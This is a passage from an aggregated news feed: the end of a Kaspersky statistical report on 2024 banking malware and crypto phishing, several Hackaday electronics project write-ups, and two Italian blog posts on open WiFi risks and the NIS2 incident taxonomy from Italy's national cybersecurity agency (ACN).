In 2024, the number of phishing and scam attacks relating to cryptocurrencies continued to grow. Kaspersky anti-phishing technologies prevented 10,706,340 attempts to follow a cryptocurrency-themed phishing link, which was approximately 83.37% higher than the 2023 figure of 5,838,499 (which itself was 16% bigger than the previous year’s). As cryptocurrencies continue to grow, this number is only ever going to get larger.
Financial PC malware
In 2024, the decline in users affected by financial PC malware continued. On the one hand, people continue to rely on mobile devices to manage their finances. On the other hand, some of the most prominent malware families that were initially designed as bankers had not used this functionality for years, so we excluded them from these statistics. As a result, the number of affected users dropped significantly from 312,453 in 2023 to 199,204 in 2024.
Changes in the number of unique users attacked by banking malware in 2024 (download)
Key financial malware actors
The notable strains of banking Trojans in 2024 included ClipBanker (62.9%), Grandoreiro (17.1%), CliptoShuffler (9.5%) and BitStealer (1.3%). Most of these Trojans specifically target crypto assets. However, Grandoreiro is a full-fledged banking Trojan that targeted 1700 banks and 276 crypto wallets in 45 countries and territories around the globe in 2024.
| Name | %* |
| ClipBanker | 62.9 |
| Grandoreiro | 17.1 |
| CliptoShuffler | 9.5 |
| BitStealer | 1.3 |
* Unique users who encountered this malware family as a percentage of all users attacked by financial malware
Geography of PC banking malware attacks
To highlight the countries where financial malware was most prevalent in 2024, we calculated the share of users who encountered banking Trojans in the total number attacked by any type of malware in the country. The following statistics indicate where users are most likely to encounter financial malware.
As in 2023, the highest share of banking Trojans was registered in Afghanistan, where it rose from 6% to 9% in 2024. Turkmenistan was next (as in 2023), where the figure rose from 5.2% to 8.8%, and Tajikistan was in third place (again), where the figure rose from 3.7% to 6.2%.
TOP 20 countries by share of attacked users
| Country* | %** |
| Afghanistan | 9.2 |
| Turkmenistan | 8.8 |
| Tajikistan | 6.2 |
| Syria | 2.9 |
| Yemen | 2.6 |
| Kazakhstan | 2.5 |
| Switzerland | 2.3 |
| Kyrgyzstan | 2.2 |
| Uzbekistan | 2.1 |
| Mexico | 1.6 |
| Angola | 1.5 |
| Mauritania | 1.5 |
| Nicaragua | 1.5 |
| Guatemala | 1.3 |
| Argentina | 1.1 |
| Paraguay | 1.1 |
| Burundi | 1.1 |
| Bolivia | 1 |
| Uruguay | 1 |
| Belarus | 0.9 |
* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.
** Unique users whose computers were targeted by financial malware as a percentage of all Kaspersky users who encountered malware in the country.
Types of attacked users
Attacks on consumers accounted for 73.69% of all financial malware attacks in 2024, up from 61.2% in 2023.
Financial malware attack distribution by type (corporate vs consumer), 2022–2023 (download)
Mobile banking malware
The statistics for 2023 provided in this section were retrospectively revised and may not coincide with the data from the previous year’s report.
In 2024, the number of users who encountered mobile banking Trojans grew 3.6 times compared to 2023: from 69,200 to 247,949. As can be seen in the graph below, the malicious activity increased dramatically in the second half of the year.
Number of Android users attacked by banking malware by month, 2022–2023 (download)
The most active Trojan-Banker family in 2024 was Mamont (36.70%). This malware first appeared at the end of 2023 and is distributed mostly in Russia and the CIS. Its distribution schemes are ranging from ages-old “Is that you in the picture?” scams to complex social engineering plots with fake stores and delivery tracking apps.
| Verdict | %* 2023 | %* 2024 | Difference in p.p. | Change in ranking |
| Trojan-Banker.AndroidOS.Mamont.bc | 0.00 | 36.70 | +36.70 | |
| Trojan-Banker.AndroidOS.Agent.rj | 0.00 | 11.14 | +11.14 | |
| Trojan-Banker.AndroidOS.Mamont.da | 0.00 | 4.36 | +4.36 | |
| Trojan-Banker.AndroidOS.Coper.a | 0.51 | 3.58 | +3.07 | +30 |
| Trojan-Banker.AndroidOS.UdangaSteal.b | 0.00 | 3.17 | +3.17 | |
| Trojan-Banker.AndroidOS.Agent.eq | 21.79 | 3.10 | -18.69 | -4 |
| Trojan-Banker.AndroidOS.Mamont.cb | 0.00 | 3.05 | +3.05 | |
| Trojan-Banker.AndroidOS.Bian.h | 23.13 | 3.02 | -20.11 | -7 |
| Trojan-Banker.AndroidOS.Faketoken.z | 0.68 | 2.96 | +2.29 | +18 |
| Trojan-Banker.AndroidOS.Coper.c | 0.00 | 2.84 | +2.84 |
* Share of unique users who encountered this malware as a percentage of all users of Kaspersky mobile security solutions who encountered banking threats
The Bian.h variant (3.02%) that prevailed in 2023 dropped to eighth place, losing over 20 p.p., and several more new samples entered the ranking: Agent.rj (11.14%) at the second place, UdangaSteal.b (3.17%) and Coper.c (2.84%).
Geography of the attacked mobile users
Same as 2023, Turkey was the number one country targeted by mobile banking malware. The share of users encountering financial threats there grew by 2.7 p.p., reaching 5.68%. Malicious activity also increased in Indonesia (2.71%), India (2.42%), Azerbaijan (0.88%), Uzbekistan (0.63%) and Malaysia (0.29%). In Spain (0.73%), Saudi Arabia (0.63%), South Korea (0.30%) and Italy (0.24%), it decreased.
| Country* | %** |
| Turkey | 5.68 |
| Indonesia | 2.71 |
| India | 2.42 |
| Azerbaijan | 0.88 |
| Spain | 0.73 |
| Saudi Arabia | 0.63 |
| Uzbekistan | 0.63 |
| South Korea | 0.30 |
| Malaysia | 0.29 |
| Italy | 0.24 |
* Countries and territories with relatively few (under 25,000) Kaspersky mobile security users have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security users in the country.
Conclusion
In 2024, financial cyberthreats continued to evolve, with cybercriminals deploying phishing, malware and social engineering techniques to exploit individuals and businesses alike. The rise in cryptocurrency-related scams and mobile financial malware highlights the need for continuous vigilance and proactive cybersecurity measures, including multi-factor authentication, user awareness training and advanced threat detection solutions. As the digital finance landscape expands, staying ahead of emerging threats remains critical.
To protect your devices and finance-related accounts:
- Use multifactor authentication, strong unique passwords and other secure authentication tools.
- Do not follow links in suspicious messages, and double-check web pages before entering your secrets, be it credentials or banking card details.
- Download apps only form trusted sources, such as official app marketplaces.
- Use reliable security solutions capable of detecting and stopping both malware and phishing attacks.
To protect your business:
- Update your software in a timely manner. Pay particular attention to security patches.
- Improve your employees’ security awareness on a regular basis, and encourage safe practices, such as proper account protection.
- Implement robust monitoring and endpoint security.
- Implement strict security policies for users with access to financial assets, such as default deny policies and network segmentation.
- Use threat intelligence services from trusted sources to stay aware of the latest threats and cybercrime trends.
securelist.com/financial-threa…
Metal Detector Built With Smartphone Interface
If you think of a metal detector, you’re probably thinking of a fairly simple device with a big coil and a piercing whine coming from a tinny speaker. [mircemk] has built a more modern adaptation. It’s a metal detector you can use with your smartphone instead.
The metal detector part of the project is fairly straightforward as far as these things go. It uses the pulse induction technique, where short pulses are fired through a coil to generate a magnetic field. Once the pulse ends, the coil is used to detect the decaying field as it spreads out. The field normally fades away in a set period of time. However, if there is metal in the vicinity, the time to decay changes, and by measuring this, it’s possible to detect the presence of metal.
In this build, an ESP32 is in charge of the show, generating the necessary pulses and detecting the resulting field. It’s paired with the usual support circuitry—an op-amp and a few transistors to drive the coil appropriately, and the usual smattering of passives. The ESP32 then picks up the signal from the coil and processes it, passing the results to a smartphone via Bluetooth.
The build is actually based on a design by [Neco Desarrollo], who presents more background and other variants for the curious. We’ve featured plenty of [mircemk]’s projects before, like this neat proximity sensor build.
youtube.com/embed/bAqhLof0Hhs?…
Reti WiFi Aperte: Un Terreno Fertile per il Cybercrime
Oggigiorno il proliferare di dispositivi portatili, indossabili o comunque Smart hanno reso indispensabile lo scambio di dati, l’accesso alle risorse e la navigazione in rete.
Questo approfondimento della Rubrica sul Wi-Fi vuole porre l’accento su una categoria di reti ampiamente diffusa. Hotel, aeroporti, sale congressi, aziende pubbliche e private, ospedali etc. offrono la possibilità di rimanere connessi all’interno delle loro strutture attraverso le così dette reti aperte ( spesso definite Reti Guest)
Le reti WiFi aperte, pur essendo utili per la comodità e l’accessibilità che offrono, rappresentano una delle minacce più significative nel panorama della sicurezza informatica. La loro mancanza di protezione le rende terreno fertile per attività illecite e per i criminali informatici, che sfruttano queste reti per intercettare dati sensibili e orchestrare attacchi complessi. Questo articolo sarà suddiviso in diverse parti.
Questo ci permetterà di esplorare in modo approfondito come le reti WiFi non protette facilitano il cybercrime. Analizzeremo alcune delle tecniche più comuni utilizzate dagli hacker e parleremo anche delle contromisure da usare per proteggersi.
Partiamo con da alcune statistich e del perchè pensiamo che questo tema non debba essere sottovaltuato.
Distribuzione delle reti WiFi aperte:
Le reti WiFi pubbliche sono diventate una necessità, come riportato nell’articolo di Broadband Search di Broadband Search
(Vital Statistics on Public WiFi: Usage, Safety & Trends – BroadbandSearch – aggiornato il 18 aprile 2024):
Nel mondo iperconnesso di oggi, il WiFi pubblico è emerso come qualcosa di più di una semplice comodità: è diventata una vera e propria necessità .
Nell’articolo viene riportato tra le altre cose il fatto che
l’Italia offre 72.680 hotspot WiFi gratuiti . Un numero significativo di questi è sponsorizzato da municipalità locali in varie città del paese. Inoltre, la maggior parte dei luoghi di svago e delle strutture ricettive offre accesso gratuito a Internet ai clienti. Le città leader nella connettività WiFi sono Roma con 4.842 hotspot, Milano con 4.626 e Napoli che segue da vicino con 4.475.
Allo stesso tempo, Forbes riporta un sondaggio fatto su 2.000 americani
forbes.com/advisor/business/pu…
Il sondaggio dimostra come l’utilizzo del Wi-Fi pubblico rimane elevato. Il 56% degli intervistati si collega alle reti Wi-Fi pubbliche senza password, nonostante i rischi.
Anche se, la maggior parte degli intervistati (il 32%) dichiara di usarla:
Come ultima spiaggia quando non c’è connessione cellulare
Sempre nel sondaggio viene confermata l’alta pericolosità delle reti WiFI aperte. Il 43% degli intervistati conferma di avere subito una compromissione della propria sicurezza online mentre usava queste reti. In calce la la classifica dei luoghi più comuni in cui gli intervistati hanno rilevato tali compromissioni:
forbes.com/advisor/business/pu…
In questa indagine di Forbes emerge chiaramente come:
- La maggior parte (35%) delle persone accede alla rete Wi-Fi pubblica tre o quattro volte al mese.
- Il 23% delle persone utilizza il Wi-Fi pubblico per ridurre l’utilizzo dei dati cellulari.
- Il 20% utilizza il Wi-Fi pubblico per effettuare transazioni finanziarie.
- I luoghi in cui le persone utilizzano più comunemente il Wi-Fi pubblico sono i ristoranti e gli hotel.
- Quattro persone su dieci hanno visto i propri dati compromessi mentre utilizzavano una rete Wi-Fi pubblica.
- La maggior parte delle persone ha visto i propri dati personali compromessi tramite reti Wi-Fi pubbliche nei bar, negli aeroporti o negli hotel.
Seppur questa ricerca sia basata su un pubblico americano noi di RedWave Team pensiamo rispecchi molto bene quanto succede anche nel nostro paese.
I Rischi principali del 2025
Diverse analisi riportano la sicurezza informatica al primo posto tra i rischi principali del 2025.
Come questa analisi dell’ ECIIA ( organizzazione internazionale senza scopo di lucro con sede a Bruxelles) dove vengono analizzati i dati raccolti da 985 CAE( comitati aziendali europei – sono comitati, istituiti in ogni impresa o gruppo di imprese di dimensioni comunitarie, sono costituiti dai dipendenti della stessa impresa e hanno la finalità di “informare e consultare i lavoratori” sull’andamento economico dell’azienda e sulle principali decisioni di carattere transnazionale che abbiano influenza sui rapporti di lavoro) di 20 Paesi europei:
eciia.eu/wp-content/uploads/20…
Come si può evidenziare dal report in questione:
- La sicurezza informatica continua a essere al primo posto, con l’83% dei CAE che la cita come uno dei rischi principali.
- L’intelligenza artificiale e la rivoluzione digitale sono i rischi in più rapida crescita e si prevede che raggiungeranno il secondo posto entro il 2028.
Conclusione
La nostra sicurezza digitale è una priorità e richiede attenzione: dobbiamo assolutamente evitare l’uso delle reti WiFi aperte
Queste reti non richiedono autenticazione per connettersi, il che significa che chiunque nel raggio di copertura può accedere alla rete.Questa caratteristica, sebbene comoda a livello di esperienza utente, introduce diverse criticità:
- Assenza di crittografia: I dati trasmessi viaggiano in chiaro su una rete aperta e possono essere facilmente intercettati da chiunque.
- Accesso anonimo: Gli utenti connessi non sono autenticati, rendendo difficile identificare o bloccare eventuali malintenzionati.
- Punti di accesso falsi: Gli attaccanti possono creare “cloni” delle reti WiFi aperte per ingannare gli utenti e intercettare il traffico. Diventando così un canale per la raccolta dei dati personali e non.
Evitare di utilizzare reti WiFi aperte è una misura fondamentale per proteggere la nostra sicurezza digitale e ridurre il rischio di esposizione a queste minacce.
L'articolo Reti WiFi Aperte: Un Terreno Fertile per il Cybercrime proviene da il blog della sicurezza informatica.
NIS2: La nuova Classificazione “Made In Italy” per gli Incidenti
Autore: Dott. Luca Mella, Cyber Security Expert
In Italia, il Decreto Legislativo del 4 settembre 2024, n. 138, ha recepito tali adeguamenti, richiedendo a pubbliche amministrazioni e aziende private uno sforzo considerevole per conformarsi ai nuovi obblighi. Tra gli adempimenti principali per il 2025, oltre la registrazione, le organizzazioni a perimetro devono prepararsi a rispettare le nuove regole di notifica degli incidenti informatici.
In questo contesto, l’Agenzia per la Cybersicurezza Nazionale (ACN) ha introdotto la Tassonomia Cyber dell’ACN (TC-ACN), uno strumento fondamentale per uniformare la comunicazione degli incidenti e migliorare lo scambio di informazioni.
La “Tassonomia Cyber dell’ACN”
Proprio per facilitare l’adeguamento ai requisiti della NIS2, l’ACN ha rilasciato una nuova linea guida denominata “Tassonomia Cyber dell’ACN” (TC-ACN). L’obiettivo tanto semplice quanto ambizioso: armonizzare il lessico e rendere più efficaci le segnalazioni e lo scambio informativo in materia di sicurezza cibernetica, il tutto per arrivare al superando delle annose ambiguità con cui tutti, nel settore, siamo abituati combattere per via di più disparati ed eterogenei sistemi di classificazione.
Nata dall’analisi delle principali tassonomie internazionali (in particolare quelle di ENISA, MITRE e MISP) e calibrata sul contesto normativo italiano, la TC-ACN è uno strumento di caratterizzazione di eventi e incidenti che si distingue per:
- Esaustività: infatti, include un catalogo estremamente ampio di attributi (in totale 144) e 22 predicati raggruppati in 4 macrocategorie.
- Espressività: TC-ACN permette di descrivere in modo granulare la natura dell’evento, l’attore responsabile, le tecniche sfruttate per la compromissione e molte altre informazioni utili alla fase di incident response.
- Allineamento con le normative nazionali (PSNC, Codice delle Comunicazioni Elettroniche, ecc.) e con le responsabilità aggiuntive introdotte dalla NIS2.
Per cominciare ad inquadrare la potenza di questo nuovo framework, esploriamo le 4 macrocategorie della TC-ACN, ovvero i suoi elementi strutturali più di alto livello:
- BC (Baseline Characterization): rappresenta il livello introduttivo dell’analisi, in cui si valutano l’entità dei danni, la natura dell’attacco e le componenti organizzative coinvolte.
- TT (Threat Type): approfondisce gli elementi tecnici dell’incidente (ad esempio i vettori di infezione, le vulnerabilità sfruttate, le tipologie di malware).
- TA (Threat Actor): identifica la “mano” dietro l’evento (gruppi criminali, singoli hacker, stati-nazione, insider malintenzionati, ecc.) e ne valuta motivazioni e competenze.
- AC (Additional Context): fornisce ulteriori informazioni contestuali, come la classificazione dei sistemi colpiti, eventuali correlazioni con incidenti passati, strumenti di difesa implementati e possibili scenari di escalation.
Figura. Macrocategorie della TC-ACN
L’approccio della TC-ACN si discosta in modo sostanziale da quello delle precedenti tassonomia, tipicamente basate su categorizzazioni in classi, puntando a una profondità di analisi paragonabile a quella utilizzata per la classificazione delle vulnerabilità (pensiamo al CVSS), basata su vettori.
Questo consente di comporre diversi “pezzi” informativi in un unico “vettore di classificazione”, includendo:
- L’impatto stimato su sistemi e dati (disponibilità, integrità, confidenzialità).
- Le tecniche di attacco adottate (malicious code, phishing, exploit kit, privilege escalation).
- L’attore e le sue motivazioni (es. crimine finanziario, spionaggio industriale, hacktivismo).
- La prospettiva temporale e geografica dell’incidente.
Ad esempio, il vettore TC-ACN “BC:IM-DE BC:RO-MA BC:SE-HI BC:VG-IT” descrive un incidente che ha portato a una grave esposizione di dati sul territorio nazionale (come un data breach) causato da azioni malevole. Questo è solamente un esempio piuttosto semplice e si limita ai soli predicati della macrocategoria “Baseline Characterization”.
Come sfruttare la TC-ACN nella pratica?
L’Agenzia ha pubblicato la linea guida ufficiale sul sito acn.gov.it e la sua adozione diventa cruciale su vari fronti:
- In primis, per ridurre i tempi di reazione, grazie a un linguaggio condiviso, i team di sicurezza riescono a comprendere immediatamente la natura e la gravità dell’evento, accelerando le contromisure;
- per migliorare la comunicazione con l’Autorità, avendo uno standard comune quando si notifica un incidente all’ACN o al CSIRT Italia, i dettagli forniti siano completi e correttamente inquadrati;
- ed infine per aumentare la conformità con la NIS2 e con le normative nazionali che richiedono la notifica degli incidenti in modo puntuale.
C’è da dire però, che la complessità della tassonomia, specie rispetto a metodi di classificazione più semplici (come quelli di ENISA), può creare iniziali difficoltà operative. A tal proposito, l’unità Cyber di Utilia SpA (società del Gruppo Società Gas Rimini) ha sviluppato e condiviso in modo gratuito uno strumento online che consente:
- La generazione guidata dei cosiddetti “vettori incidente” secondo la tassonomia ACN, compilando passo a passo gli attributi richiesti.
- L’esportazione delle informazioni in un formato adatto per la notifica all’ACN e al CSIRT, o per la condivisione interna tra i reparti di sicurezza.
- L’aggiornamento costante dello strumento, integrando eventuali revisioni della tassonomia o nuove specifiche da parte dell’ACN.
In tal modo, le imprese che si apprestano a rispettare le prossime scadenze (dalla registrazione alla notifica obbligatoria) possono disporre di un supporto in grado di limitare il rischio di non conformità e agevolare la gestione degli incidenti.
Figura. Tool di Generazione Vettore TC-ACN (tassonomia-acn.utilia.it/ )
Conclusioni
Con la piena entrata in vigore della Direttiva NIS2, il panorama della cybersicurezza nazionale si appresta a un cambio di marcia. La Tassonomia Cyber dell’ACN funge da fulcro per la standardizzazione delle segnalazioni di incidenti, garantendo:
- Maggiore chiarezza nella comunicazione tra enti, aziende e autorità.
- Riduzione dei tempi di intervento e maggiore tempestività nella risposta agli attacchi.
- Strutturazione e uniformità nel riportare i dati, utili anche per analisi di trend a livello sistemico.
Prepararsi con anticipo, studiando i predicati e i valori della tassonomia, e sfruttando i tool a disposizione, può fare la differenza nell’evitare sanzioni e nell’innalzare concretamente la soglia di sicurezza per gli attori coinvolti.
La TC-ACN rappresenta quindi non solo un adempimento normativo, ma una risorsa strategica per garantire la resilienza del tessuto digitale italiano, consolidando un vero e proprio linguaggio comune in grado di elevare gli standard di sicurezza informatica e di tutela dei servizi essenziali per la collettività.
L'articolo NIS2: La nuova Classificazione “Made In Italy” per gli Incidenti proviene da il blog della sicurezza informatica.
Handheld Console Plays Original Pong With Modern E-Waste
[Simon] wrote in to let us know about DingPong, his handheld portable Pong console. There’s a bit more to it than meets the eye, however. Consider for a moment that back in the 1970s playing Pong required a considerable amount of equipment, not least of which was dedicated electronics and a CRT monitor. What was huge (in more than one way) in the 70s has been shrunk down to handheld, and implemented almost entirely on modern e-waste in the process.
DingPong is housed in an old video doorbell unit (hence the name) and the screen is a Sony Video Watchman, a portable TV from 1982 with an amazing 4-inch CRT whose guts [Simon] embeds into the enclosure. Nearly everything in the build is either salvaged, or scrounged from the junk bin. Components are in close-enough values, and power comes from nameless lithium-ion batteries that are past their prime but still good enough to provide about an hour of runtime. The paddle controllers? Two pots (again, of not-quite-the-right values) sticking out the sides of the unit, one for each player.
At the heart of DingPong one will not find any flavor of Arduino, Raspberry Pi, or ESP32. Rather, it’s built around an AY-3-8500 “Ball & paddle” (aka ‘Pong’) integrated circuit from 1977, which means DingPong plays the real thing!
We have seen Pong played on a Sony Watchman before, and we’ve also seen a vintage Pong console brought back to life, but we’re pretty sure this is the first time we’ve seen a Sony Watchman running Pong off a chip straight from the 70s. Watch it in action in the video (in German), embedded below.
youtube.com/embed/BKmamKUb-zc?…
Glow In The Dark PCBs Are Pretty Cool
What if circuit boards could glow in the dark? It’s a fun question, and one [Botmatrix] sought to answer when approached by manufacturer PCBWay to run a project together. It turns out that it’s quite possible to make glowing PCBs, with attractive results. (Video after the break.)
Specifically, PCBWay has developed a workable glow-in-the-dark silkscreen material that can be applied to printed circuit boards. As a commercial board house, PCBWay hasn’t rushed to explain how precisely they pulled off this feat, but we don’t imagine that it involved anything more than adding some glow-in-the-dark powder to their usual silkscreen ink, but we can only speculate.
On [Botmatrix]’s end, his video steps through some neat testing of the performance of the boards. They’re tested using sensors to determine how well they glow over time.
It might seem like a visual gimmick, and to an extent, it’s just a bit of fun. But still, [Botmatrix] notes that it could have some practical applications too. For example, glow-in-the-dark silkscreen could be used to highlight specific test points on a board or similar, which could be instantly revealed with the use of a UV flashlight. It’s an edge case, but a compelling one. It’s also likely to be very fun for creating visually reactive conference badges or in other applications where the PCB plays a major cosmetic role.
[Botmatrix] says these are potentially the first commercially-available glow-in-the-dark printed PCBs. We love glow in the dark stuff; we’ve even explored how to make your own glowing material before, too. .
youtube.com/embed/bdmOeqohdNs?…
PPS Is The Hottest USB-C Feature You Didn’t Know About
USB Power Delivery is widely considered to be a good thing. It’s become relatively standard, and is a popular way for makers to easily power their projects at a number of specific, useful voltages. However, what you may not know is that it’s possible to get much more variable voltages out of some USB chargers out there. As [GreatScott!] explains, you’ll want to meet USB-C PPS.
PPS stands for Programmable Power Supply. It’s a method by which a USB-C device can request variable voltage and current delivery on demand. Unlike the Power Delivery standard, you’re not limited to set voltages at tiers of 5V, 9V, 15V and 20V. You can have your device request the exact voltage it wants, right from the charger. Commercially, it’s most typically used to allow smartphones to charge as fast as possible by getting the optimum voltage to plumb into the battery. However, with the right techniques, you can use PPS to get a charger to output whatever voltage you want, from 3.3 V to 21 V, for your own nefarious purposes. You can choose a voltage in 20 mV increments, and even set a current limit in 50 mA increments. Don’t go mad with power, now.
However, there’s a hitch. Unlike USB PD, there isn’t yet a whole ecosystem of $2 PPS breakout boards ready to gloop into your own little projects. As [GreatScott!] suggests, if you want to use PPS, you might want to take a look at the AP33772S IC. It’s a USB PD3.1 Sink Controller. You can command it over I2C to ask for the voltage and current you want. If that’s too hard, though, [CentyLab] has a solution on Tindie to get you going faster. It’s also got some exciting additional functionality—like USB-C AVS support. It offers higher voltage and more power, albeit with less resolution, but chargers with this functionality are quite obscure at this stage.
We’ve actually touched on PPS capability before in our exploration of the magic that is USB-C Power Delivery. Video after the break.
youtube.com/embed/kcmpGbR6xZc?…
[Thanks to Keith Olson for the tip!]
Mural: The Plotter That Draws On Walls
Let’s say you’ve got a big bare wall in your home, and you want some art on it. You could hang a poster or a framed artwork, or you could learn to paint a mural yourself. Or, like [Nik Ivanov], you could build a plotter called Mural, and get it to draw something on the wall for you.
The build is straightforward enough. It uses a moving carriage suspended from toothed belts attached to two points up high on the wall. Stepper motors built into the carriage reel the belts in and out to move it up and down the wall, and from side to side. In this case, [Nik] selected a pair of NEMA 17 steppers to do the job. They’re commanded by a NodeMCU ESP32, paired with TMC2209 stepper motor drivers. The carriage also includes a pen lifter, which relies on a MG90s servo to lift the drawing implement away from the wall.
The build is quite capable, able to recreate SVG vector graphics quite accurately, without obvious skew or distortion. [Nik] has been using the plotter with washable Crayola markers, so he can print on the wall time and again without leaving permanent marks. It’s a great way to decorate—over and over again—on a budget. Total estimated cost is under $100, according to [Nik].
We’ve featured some neat projects along these lines before, too. Video after the break.
youtube.com/embed/MOENFOZCs54?…
Wearable Computing Goes Woven, Wireless, and Washable
Sometimes we come across a wild idea that really tries to re-imagine things, and re-conceiving wearable computing as a distributed system of “fiber computers” embedded into textiles is definitely that. The research paper presents fully-functional fiber computers and sensors that are washable, weave-able, wireless, and resist both stretching and bending.
The research paper with all the details is behind a paywall at this time, but we’ll summarize the important parts that are likely to get a hacker’s mind working.
The inner components of a fiber computer are pretty recognizable: each contains a surface-mount microcontroller, LEDs, BLE (Bluetooth Low Energy) radio, light sensor, temperature sensor, accelerometer, and photoplethysmography (PPG) sensor for measuring blood volume changes through skin. Power is supplied by a separate segment containing a tiny cylindrical lithium-polymer battery, with a simple plug connector. It’s a tiny battery, but the system is so low-power that it still provides hours of operation.
If there’s a secret sauce, it’s in the fabrication. The first step is stretching a system into a long, thin circuit. Each component is nested onto a small piece of flex PCB that acts a little like a breakout board, and that flex PCB gets rolled around each component to make as tiny a package as possible. These little payloads are connected to one another by thin wires, evenly spaced to form a long circuit. That circuit gets (carefully!) sealed into a thermoformed soft polymer and given an overbraid, creating a fiber that has a few lumps here and there but is nevertheless remarkably thin and durable. The result can be woven into fabrics, worn, washed, bent, and in general treated like a piece of clothing.
Multiple fibers are well-suited to being woven into clothing in a distributed way, such as one for each limb. Each fiber is self-contained but communicates with its neighbors using a BLE mesh, or transmitting data optically via embedded LEDs and light sensors. Right now, such a distributed system has been shown to be able to perform health monitoring and accurately classify different physical activities.
We’ve seen sensors directly on skin and transmitting power over skin, but this is a clever fusion of conventional parts and unconventional design — wearable computing that’s not just actually wearable and unobtrusive, but durable and even washable.